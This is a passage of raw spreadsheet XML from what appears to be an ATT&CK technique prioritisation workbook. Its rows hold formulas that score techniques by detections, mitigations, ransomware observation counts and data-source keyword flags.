        <f t="array" ref="AI388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD388)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ388" s="37">
        <v>384</v>
      </c>
      <c r="AK388" s="37" t="str" cm="1">
        <f t="array" ref="AK388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD388)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL388" s="37">
        <v>384</v>
      </c>
      <c r="AM388" s="37" t="str" cm="1">
        <f t="array" ref="AM388">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD388)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN388" s="37">
        <v>0</v>
      </c>
      <c r="AO388" s="37">
        <v>1</v>
      </c>
      <c r="AP388" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ388" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>121.98415138095238</v>
      </c>
      <c r="AR388" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS388" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT388" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU38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2.9281940804988662</v>
      </c>
    </row>
    <row r="389" spans="1:47" ht="68">
      <c r="A389" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B389" s="37">
        <f t="shared" ref="B389:B452" si="6">SUM(H389,M389,V389)*(1+SUM(AF389,AH389,AJ389,AL389,AN389))</f>
        <v>1647.3579854761906</v>
      </c>
      <c r="C389" s="37" t="s">
        <v>1368</v>
      </c>
      <c r="D389" s="50" t="s">
        <v>1369</v>
      </c>
      <c r="E389" s="37"/>
      <c r="F389" s="37">
        <v>3</v>
      </c>
      <c r="G389" s="37">
        <v>4</v>
      </c>
      <c r="H389" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I389" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J389" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K389" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L389" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M389" s="37">
        <v>0.109495</v>
      </c>
      <c r="N389" s="56">
        <v>1</v>
      </c>
      <c r="O389" s="56">
        <v>14</v>
      </c>
      <c r="P389" s="56">
        <v>2</v>
      </c>
      <c r="Q389" s="56">
        <v>1</v>
      </c>
      <c r="R389" s="57" t="s">
        <v>1370</v>
      </c>
      <c r="S389" s="57">
        <v>28</v>
      </c>
      <c r="T389" s="57" t="s">
        <v>1371</v>
      </c>
      <c r="U389" s="57">
        <v>33</v>
      </c>
      <c r="V389" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.60952380952380958</v>
      </c>
      <c r="W389" s="37">
        <v>61</v>
      </c>
      <c r="X389" s="37">
        <v>1.109091</v>
      </c>
      <c r="Y389" s="37">
        <v>1</v>
      </c>
      <c r="Z389" s="37">
        <v>18</v>
      </c>
      <c r="AA389" s="37">
        <v>0.18</v>
      </c>
      <c r="AB389" s="37">
        <v>0.18</v>
      </c>
      <c r="AC389" s="37"/>
      <c r="AD389" s="50" t="s">
        <v>1372</v>
      </c>
      <c r="AE389" s="37" t="str" cm="1">
        <f t="array" ref="AE389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD389)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF389" s="37">
        <v>385</v>
      </c>
      <c r="AG389" s="37" t="str" cm="1">
        <f t="array" ref="AG389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD389)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH389" s="37">
        <v>385</v>
      </c>
      <c r="AI389" s="37" t="str" cm="1">
        <f t="array" ref="AI389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD389)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ389" s="37">
        <v>385</v>
      </c>
      <c r="AK389" s="37" t="str" cm="1">
        <f t="array" ref="AK389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD389)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL389" s="37">
        <v>385</v>
      </c>
      <c r="AM389" s="37" t="str" cm="1">
        <f t="array" ref="AM389">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD389)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN389" s="37">
        <v>0</v>
      </c>
      <c r="AO389" s="37">
        <v>2</v>
      </c>
      <c r="AP389" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ389" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>549.11932849206357</v>
      </c>
      <c r="AR389" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS389" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT389" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU38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26.196158499622072</v>
      </c>
    </row>
    <row r="390" spans="1:47" ht="17">
      <c r="A390" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B390" s="37">
        <f t="shared" si="6"/>
        <v>676.85699571428563</v>
      </c>
      <c r="C390" s="37" t="s">
        <v>1373</v>
      </c>
      <c r="D390" s="50" t="s">
        <v>1369</v>
      </c>
      <c r="E390" s="37" t="s">
        <v>1374</v>
      </c>
      <c r="F390" s="37">
        <v>1</v>
      </c>
      <c r="G390" s="37">
        <v>1</v>
      </c>
      <c r="H390" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I390" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J390" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K390" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L390" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M390" s="37">
        <v>0</v>
      </c>
      <c r="N390" s="56">
        <v>1</v>
      </c>
      <c r="O390" s="56">
        <v>3</v>
      </c>
      <c r="P390" s="56">
        <v>0</v>
      </c>
      <c r="Q390" s="56">
        <v>3</v>
      </c>
      <c r="R390" s="57" t="s">
        <v>1375</v>
      </c>
      <c r="S390" s="57">
        <v>14</v>
      </c>
      <c r="T390" s="57" t="s">
        <v>1376</v>
      </c>
      <c r="U390" s="57">
        <v>18</v>
      </c>
      <c r="V390" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.33809514285714282</v>
      </c>
      <c r="W390" s="37">
        <v>32</v>
      </c>
      <c r="X390" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y390" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z390" s="37">
        <v>7</v>
      </c>
      <c r="AA390" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB390" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC390" s="37"/>
      <c r="AD390" s="50" t="s">
        <v>101</v>
      </c>
      <c r="AE390" s="37" t="str" cm="1">
        <f t="array" ref="AE390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD390)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF390" s="37">
        <v>386</v>
      </c>
      <c r="AG390" s="37" t="str" cm="1">
        <f t="array" ref="AG390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD390)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH390" s="37">
        <v>386</v>
      </c>
      <c r="AI390" s="37" t="str" cm="1">
        <f t="array" ref="AI390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD390)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ390" s="37">
        <v>386</v>
      </c>
      <c r="AK390" s="37" t="str" cm="1">
        <f t="array" ref="AK390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD390)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL390" s="37">
        <v>386</v>
      </c>
      <c r="AM390" s="37" t="str" cm="1">
        <f t="array" ref="AM390">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD390)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN390" s="37">
        <v>0</v>
      </c>
      <c r="AO390" s="37">
        <v>4</v>
      </c>
      <c r="AP390" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ390" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>225.61899857142853</v>
      </c>
      <c r="AR390" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS390" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT390" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU39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21.582761768707478</v>
      </c>
    </row>
    <row r="391" spans="1:47" ht="51">
      <c r="A391" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B391" s="37">
        <f t="shared" si="6"/>
        <v>604.84784033333335</v>
      </c>
      <c r="C391" s="37" t="s">
        <v>1377</v>
      </c>
      <c r="D391" s="50" t="s">
        <v>1369</v>
      </c>
      <c r="E391" s="37" t="s">
        <v>1378</v>
      </c>
      <c r="F391" s="37">
        <v>1</v>
      </c>
      <c r="G391" s="37">
        <v>1</v>
      </c>
      <c r="H391" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I391" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J391" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K391" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L391" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M391" s="37">
        <v>0</v>
      </c>
      <c r="N391" s="56">
        <v>0</v>
      </c>
      <c r="O391" s="56">
        <v>3</v>
      </c>
      <c r="P391" s="56">
        <v>0</v>
      </c>
      <c r="Q391" s="56">
        <v>0</v>
      </c>
      <c r="R391" s="57" t="s">
        <v>1379</v>
      </c>
      <c r="S391" s="57">
        <v>11</v>
      </c>
      <c r="T391" s="57" t="s">
        <v>1380</v>
      </c>
      <c r="U391" s="57">
        <v>18</v>
      </c>
      <c r="V391" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.29047633333333334</v>
      </c>
      <c r="W391" s="37">
        <v>29</v>
      </c>
      <c r="X391" s="37">
        <v>0.52727299999999999</v>
      </c>
      <c r="Y391" s="37">
        <v>0.52727299999999999</v>
      </c>
      <c r="Z391" s="37">
        <v>3</v>
      </c>
      <c r="AA391" s="37">
        <v>0.03</v>
      </c>
      <c r="AB391" s="37">
        <v>0.03</v>
      </c>
      <c r="AC391" s="37"/>
      <c r="AD391" s="50" t="s">
        <v>1381</v>
      </c>
      <c r="AE391" s="37" t="str" cm="1">
        <f t="array" ref="AE391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD391)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF391" s="37">
        <v>387</v>
      </c>
      <c r="AG391" s="37" t="str" cm="1">
        <f t="array" ref="AG391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD391)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH391" s="37">
        <v>387</v>
      </c>
      <c r="AI391" s="37" t="str" cm="1">
        <f t="array" ref="AI391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD391)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ391" s="37">
        <v>387</v>
      </c>
      <c r="AK391" s="37" t="str" cm="1">
        <f t="array" ref="AK391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD391)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL391" s="37">
        <v>387</v>
      </c>
      <c r="AM391" s="37" t="str" cm="1">
        <f t="array" ref="AM391">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD391)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN391" s="37">
        <v>0</v>
      </c>
      <c r="AO391" s="37">
        <v>2</v>
      </c>
      <c r="AP391" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ391" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>201.61594677777779</v>
      </c>
      <c r="AR391" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS391" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT391" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU39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9.6483784179894183</v>
      </c>
    </row>
    <row r="392" spans="1:47" ht="17">
      <c r="A392" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B392" s="37">
        <f t="shared" si="6"/>
        <v>310.60022185714291</v>
      </c>
      <c r="C392" s="37" t="s">
        <v>1382</v>
      </c>
      <c r="D392" s="50" t="s">
        <v>1369</v>
      </c>
      <c r="E392" s="37" t="s">
        <v>1383</v>
      </c>
      <c r="F392" s="37">
        <v>1</v>
      </c>
      <c r="G392" s="37">
        <v>1</v>
      </c>
      <c r="H392" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I392" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J392" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K392" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L392" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M392" s="37">
        <v>0</v>
      </c>
      <c r="N392" s="56">
        <v>0</v>
      </c>
      <c r="O392" s="56">
        <v>5</v>
      </c>
      <c r="P392" s="56">
        <v>1</v>
      </c>
      <c r="Q392" s="56">
        <v>1</v>
      </c>
      <c r="R392" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S392" s="57">
        <v>3</v>
      </c>
      <c r="T392" s="57" t="s">
        <v>1384</v>
      </c>
      <c r="U392" s="57">
        <v>4</v>
      </c>
      <c r="V392" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10000014285714287</v>
      </c>
      <c r="W392" s="37">
        <v>7</v>
      </c>
      <c r="X392" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y392" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z392" s="37">
        <v>7</v>
      </c>
      <c r="AA392" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB392" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC392" s="37"/>
      <c r="AD392" s="50" t="s">
        <v>101</v>
      </c>
      <c r="AE392" s="37" t="str" cm="1">
        <f t="array" ref="AE392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD392)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF392" s="37">
        <v>388</v>
      </c>
      <c r="AG392" s="37" t="str" cm="1">
        <f t="array" ref="AG392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD392)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH392" s="37">
        <v>388</v>
      </c>
      <c r="AI392" s="37" t="str" cm="1">
        <f t="array" ref="AI392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD392)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ392" s="37">
        <v>388</v>
      </c>
      <c r="AK392" s="37" t="str" cm="1">
        <f t="array" ref="AK392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD392)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL392" s="37">
        <v>388</v>
      </c>
      <c r="AM392" s="37" t="str" cm="1">
        <f t="array" ref="AM392">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD392)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN392" s="37">
        <v>0</v>
      </c>
      <c r="AO392" s="37">
        <v>1</v>
      </c>
      <c r="AP392" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ392" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>103.5334072857143</v>
      </c>
      <c r="AR392" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS392" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT392" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU39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2.4888906496598642</v>
      </c>
    </row>
    <row r="393" spans="1:47" ht="16" customHeight="1">
      <c r="A393" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B393" s="37">
        <f t="shared" si="6"/>
        <v>674.70029657142857</v>
      </c>
      <c r="C393" s="37" t="s">
        <v>1385</v>
      </c>
      <c r="D393" s="50" t="s">
        <v>1369</v>
      </c>
      <c r="E393" s="37" t="s">
        <v>1386</v>
      </c>
      <c r="F393" s="37">
        <v>1</v>
      </c>
      <c r="G393" s="37">
        <v>1</v>
      </c>
      <c r="H393" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I393" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J393" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K393" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L393" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M393" s="37">
        <v>0</v>
      </c>
      <c r="N393" s="56">
        <v>0</v>
      </c>
      <c r="O393" s="56">
        <v>0</v>
      </c>
      <c r="P393" s="56">
        <v>0</v>
      </c>
      <c r="Q393" s="56">
        <v>0</v>
      </c>
      <c r="R393" s="57" t="s">
        <v>1387</v>
      </c>
      <c r="S393" s="57">
        <v>13</v>
      </c>
      <c r="T393" s="57" t="s">
        <v>1388</v>
      </c>
      <c r="U393" s="57">
        <v>22</v>
      </c>
      <c r="V393" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.33333352380952386</v>
      </c>
      <c r="W393" s="37">
        <v>35</v>
      </c>
      <c r="X393" s="37">
        <v>0.63636400000000004</v>
      </c>
      <c r="Y393" s="37">
        <v>0.63636400000000004</v>
      </c>
      <c r="Z393" s="37">
        <v>0</v>
      </c>
      <c r="AA393" s="37">
        <v>0</v>
      </c>
      <c r="AB393" s="37">
        <v>0</v>
      </c>
      <c r="AC393" s="37"/>
      <c r="AD393" s="50" t="s">
        <v>101</v>
      </c>
      <c r="AE393" s="37" t="str" cm="1">
        <f t="array" ref="AE393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD393)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF393" s="37">
        <v>389</v>
      </c>
      <c r="AG393" s="37" t="str" cm="1">
        <f t="array" ref="AG393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD393)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH393" s="37">
        <v>389</v>
      </c>
      <c r="AI393" s="37" t="str" cm="1">
        <f t="array" ref="AI393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD393)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ393" s="37">
        <v>389</v>
      </c>
      <c r="AK393" s="37" t="str" cm="1">
        <f t="array" ref="AK393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD393)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL393" s="37">
        <v>389</v>
      </c>
      <c r="AM393" s="37" t="str" cm="1">
